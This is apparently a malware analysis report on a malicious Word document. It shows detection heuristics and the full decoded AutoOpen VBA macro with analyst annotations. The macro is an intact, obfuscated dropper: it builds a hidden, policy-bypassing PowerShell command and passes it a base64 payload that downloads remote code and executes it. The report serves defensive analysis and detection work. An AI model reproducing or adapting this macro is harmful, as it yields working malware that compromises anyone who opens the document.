Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bf801a42e2689083…

MALICIOUS

Office (OLE)

268.5 KB Created: 2018-03-02 16:12:00 Authoring application: Microsoft Office Word First seen: 2018-03-30
MD5: 1ff8a808b76beb0d7d61cbf95f26fbf5 SHA-1: 5b695faa50a39a1dd42add1784a103fe69e57d02 SHA-256: bf801a42e26890831780a7413d93268e456babf289cd21957f644cf14c0f226f
170 Risk Score

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6464062-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6464062-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        CL_QJ = CL_QJ + CR_KI
        Shell$ CL_QJ
    End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "module"
    Sub AutoOpen()
        Dim CL_QJ As String
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro-execution surface; on its own it is not attribution to a downloader or to a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the DrawingML XML namespace identifier routinely embedded in Office documents; treat it as expected noise rather than a callback indicator unless other evidence says otherwise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6263 bytes
SHA-256: 56b0b579c8a4d36334539eba2c92712a0fde7742b9fd5f61d1cea3143b633a58
Preview script
First 1,000 lines of the extracted script
' [analyst] Listing as decoded by olevba: a ThisDocument attribute stub (attributes only, no code)
' followed by a second module named "module" that holds the auto-executing Sub.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "module"
' [analyst] AutoOpen is run by Word when the document is opened with macros enabled (OLE_VBA_AUTOOPEN).
' The Sub assembles a command line in CL_QJ, accumulates a second string in CR_KI, concatenates the two
' and passes the result to Shell$ on the last line (OLE_VBA_SHELL). Neither IK_LD nor CR_KI is declared,
' so the module has no Option Explicit and both are implicit Variants.
Sub AutoOpen()
    Dim CL_QJ As String
    ' [analyst] 20-character pool. CL_QJ is built one character at a time by indexing into it, so the
    ' resulting keywords never appear as literals and a plain keyword scan of the macro misses them.
    ' Replaying the index sequence used below (5,4,19,14,12,2,8,14,...) reproduces the text
    ' "powershell -windowstyle hidden -executionpolicy bypass -e " — confirm by decoding the indices.
    IK_LD = Array("y", "a", "s", "l", "o", "p", "c", "i", "h", "x", "b", " ", "r", "u", "e", "d", "n", "-", "t", "w")
    Dim BT_TA As String
    ' [analyst] The Dim/assign pairs interleaved with the character lookups are fragments of one long
    ' string that is appended to CR_KI in groups of up to five. The fragments use only the base64
    ' alphabet, and the recurring "A" in alternating positions is consistent with base64 of UTF-16LE
    ' text, which is the encoding the "-e" argument built above expects; decode the fully assembled
    ' CR_KI (not the individual fragments) to recover the next stage.
    BT_TA = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAApAHsAcg"
    CL_QJ = CL_QJ + IK_LD(5)
    CL_QJ = CL_QJ + IK_LD(4)
    Dim BL_PD As String
    BL_PD = "BlAHQAdQByAG4AIABbAFMAeQB"
    CL_QJ = CL_QJ + IK_LD(19)
    CL_QJ = CL_QJ + IK_LD(14)
    Dim DS_TJ As String
    DS_TJ = "zAHQAZQBtAC4AVABlAHgAdAA"
    CL_QJ = CL_QJ + IK_LD(12)
    CL_QJ = CL_QJ + IK_LD(2)
    Dim JQ_SA As String
    JQ_SA = "uAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4"
    CL_QJ = CL_QJ + IK_LD(8)
    CL_QJ = CL_QJ + IK_LD(14)
    Dim CR_LH As String
    CR_LH = "AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZ"
    ' [analyst] First group of five fragments appended; the same pattern repeats below.
    CR_KI = CR_KI & BT_TA & BL_PD & DS_TJ & JQ_SA & CR_LH
    CL_QJ = CL_QJ + IK_LD(3)
    CL_QJ = CL_QJ + IK_LD(3)
    Dim FN_PA As String
    FN_PA = "QBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIA"
    CL_QJ = CL_QJ + IK_LD(11)
    CL_QJ = CL_QJ + IK_LD(17)
    Dim IK_QD As String
    IK_QD = "YQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB4ACkAKQB"
    CL_QJ = CL_QJ + IK_LD(19)
    CL_QJ = CL_QJ + IK_LD(7)
    Dim HR_RI As String
    HR_RI = "9ADsAaQBlAHgAIAAkAC"
    CL_QJ = CL_QJ + IK_LD(16)
    CL_QJ = CL_QJ + IK_LD(15)
    Dim BQ_RJ As String
    BQ_RJ = "gAYQAgACQAKAAkACgAJAA"
    CL_QJ = CL_QJ + IK_LD(4)
    CL_QJ = CL_QJ + IK_LD(19)
    Dim HO_TH As String
    HO_TH = "oAGkAbgB2A"
    CR_KI = CR_KI & FN_PA & IK_QD & HR_RI & BQ_RJ & HO_TH
    CL_QJ = CL_QJ + IK_LD(2)
    CL_QJ = CL_QJ + IK_LD(18)
    Dim DR_NH As String
    DR_NH = "G8AawBlAC0AdwBlAGIAcgBlAHEAdQBl"
    CL_QJ = CL_QJ + IK_LD(0)
    CL_QJ = CL_QJ + IK_LD(3)
    Dim BQ_LJ As String
    BQ_LJ = "AHMAdAAgACcAaAB0AHQAcAB"
    CL_QJ = CL_QJ + IK_LD(14)
    CL_QJ = CL_QJ + IK_LD(11)
    Dim CR_LJ As String
    CR_LJ = "zADoALwAvA"
    CL_QJ = CL_QJ + IK_LD(8)
    CL_QJ = CL_QJ + IK_LD(7)
    Dim HO_OG As String
    HO_OG = "HUAcwBwAHIAZAA1AD"
    CL_QJ = CL_QJ + IK_LD(15)
    CL_QJ = CL_QJ + IK_LD(15)
    Dim CQ_KI As String
    CQ_KI = "EANQAwAGMAZQBu"
    CR_KI = CR_KI & DR_NH & BQ_LJ & CR_LJ & HO_OG & CQ_KI
    CL_QJ = CL_QJ + IK_LD(14)
    CL_QJ = CL_QJ + IK_LD(16)
    Dim IS_QF As String
    IS_QF = "AHQAcgBhAGwALgB0AG"
    CL_QJ = CL_QJ + IK_LD(11)
    CL_QJ = CL_QJ + IK_LD(17)
    Dim EP_QG As String
    EP_QG = "EAYgBsAGUALgBj"
    CL_QJ = CL_QJ + IK_LD(14)
    CL_QJ = CL_QJ + IK_LD(9)
    Dim FN_KG As String
    FN_KG = "AG8AcgBlAC4"
    CL_QJ = CL_QJ + IK_LD(14)
    CL_QJ = CL_QJ + IK_LD(6)
    Dim DQ_OA As String
    DQ_OA = "AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8"
    CL_QJ = CL_QJ + IK_LD(13)
    CL_QJ = CL_QJ + IK_LD(18)
    Dim JN_SG As String
    JN_SG = "AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AUABhAHIAdABpAHQA"
    CR_KI = CR_KI & IS_QF & EP_QG & FN_KG & DQ_OA & JN_SG
    CL_QJ = CL_QJ + IK_LD(7)
    CL_QJ = CL_QJ + IK_LD(4)
    Dim CT_KF As String
    CT_KF = "aQBvAG4ASwBlAHkAJQAyADAAZQBxACUAMgAwACU"
    CL_QJ = CL_QJ + IK_LD(16)
    CL_QJ = CL_QJ + IK_LD(5)
    Dim EO_SC As String
    EO_SC = "AMgA3AHM"
    CL_QJ = CL_QJ + IK_LD(4)
    CL_QJ = CL_QJ + IK_LD(3)
    Dim EP_SA As String
    EP_SA = "AdABhAGcAZQAlADIANwAmA"
    CL_QJ = CL_QJ + IK_LD(7)
    CL_QJ = CL_QJ + IK_LD(6)
    Dim DN_MH As String
    DN_MH = "CQAUwBlAGwAZ"
    CL_QJ = CL_QJ + IK_LD(0)
    CL_QJ = CL_QJ + IK_LD(11)
    Dim FP_TH As String
    FP_TH = "QBjAHQAPQBkAGEAdABhA"
    CR_KI = CR_KI & CT_KF & EO_SC & EP_SA & DN_MH & FP_TH
    CL_QJ = CL_QJ + IK_LD(10)
    CL_QJ = CL_QJ + IK_LD(0)
    Dim FT_OF As String
    FT_OF = "CYAcwB2AD0AMgAwADEANwAtA"
    CL_QJ = CL_QJ + IK_LD(5)
    CL_QJ = CL_QJ + IK_LD(1)
    Dim DO_LI As String
    DO_LI = "DAANAAtADEANwAmAHMAcwA9AGIAZgBx"
    CL_QJ = CL_QJ + IK_LD(2)
    CL_QJ = CL_QJ + IK_LD(2)
    Dim CK_SF As String
    CK_SF = "AHQAJgBzAHIAdAA"
    CL_QJ = CL_QJ + IK_LD(11)
    CL_QJ = CL_QJ + IK_LD(17)
    Dim AO_LA As String
    AO_LA = "9AHMAYwBvACYAcwBwAD0AcgB3AGQAbA"
    CL_QJ = CL_QJ + IK_LD(14)
    CL_QJ = CL_QJ + IK_LD(11)
    Dim CT_NJ As String
    CT_NJ = "BhAGMAdQBwACYAcwBlAD0AMgAwADE"
    CR_KI = CR_KI & FT_OF & DO_LI & CK_SF & AO_LA & CT_NJ
    ' [analyst] Character lookups stop here; CL_QJ is complete. The remainder only finishes CR_KI.
    Dim AP_KD As String
    AP_KD = "ANwAtADEAMAAtADAANgBUADIAMgA6ADQAMQA6ADEAMgBaACYA"
    Dim AL_NA As String
    AL_NA = "cwB0AD0A"
    Dim BR_TE As String
    BR_TE = "MgAwADEANw"
    Dim HS_KE As String
    HS_KE = "AtADAAOQAtADIAOAB"
    Dim GM_LA As String
    GM_LA = "UADEANAA6ADQAMQA6ADEAMgBaACYAcwBwAHIAPQ"
    CR_KI = CR_KI & AP_KD & AL_NA & BR_TE & HS_KE & GM_LA
    Dim CK_TI As String
    CK_TI = "BoAHQAdABw"
    Dim DL_PD As String
    DL_PD = "AHMAJgBzAGkA"
    Dim DP_SF As String
    DP_SF = "ZwA9AHQAegBQ"
    Dim CS_NA As String
    CS_NA = "ADcAYwA4AHgAWgBoA"
    Dim FM_OA As String
    FM_OA = "HIAMQBzAGIAdgB4ADkAZgBKAFMAdwBKAEkAUwBIAEIA"
    CR_KI = CR_KI & CK_TI & DL_PD & DP_SF & CS_NA & FM_OA
    Dim JT_OD As String
    JT_OD = "NgBlADgAJQAyAEIAbgBsAGwAdQ"
    Dim IO_SI As String
    IO_SI = "BuAEgAaQBmAEwAMwBoAHgAagA0ACUAMwBEACc"
    Dim BN_KF As String
    BN_KF = "AIAAtAEgAZQBhAGQAZQByAHMAIABAAHsA"
    Dim AN_SC As String
    AN_SC = "JwBBAGMAYwB"
    Dim JO_NJ As String
    JO_NJ = "lAHAAdAAnAD0AJwBBAHAAcABsAGkAYwB"
    CR_KI = CR_KI & JT_OD & IO_SI & BN_KF & AN_SC & JO_NJ
    Dim DO_NB As String
    DO_NB = "hAHQAaQBvAG4ALwBKAFMATwBOACcAfQApAC4AQwBvAG4AdABlA"
    Dim AM_NB As String
    AM_NB = "G4AdAAgAHw"
    Dim JT_TE As String
    JT_TE = "AIABDAG8AbgB2AGUAcgB0AEY"
    CR_KI = CR_KI & DO_NB & AM_NB & JT_TE
    Dim DN_RD As String
    DN_RD = "AcgBvAG0ALQBKAHMAbwBuACkALgB2AGEAbAB1AGUAL"
    CR_KI = CR_KI & DN_RD
    Dim CO_NF As String
    CO_NF = "gBkAGEAdABhACkAKQA="
    ' [analyst] Trailing "=" padding marks the end of the base64 blob.
    CR_KI = CR_KI & CO_NF
    ' [analyst] Final command = character-built prefix + accumulated encoded argument, handed to Shell$.
    ' Detection note: statically the tell-tale is the index/fragment pattern above; at runtime it is
    ' Word spawning a PowerShell child with a hidden window and an encoded command, which is the
    ' behaviour to alert on (and which blocking macros / Office child-process creation prevents).
    CL_QJ = CL_QJ + CR_KI
    Shell$ CL_QJ
End Sub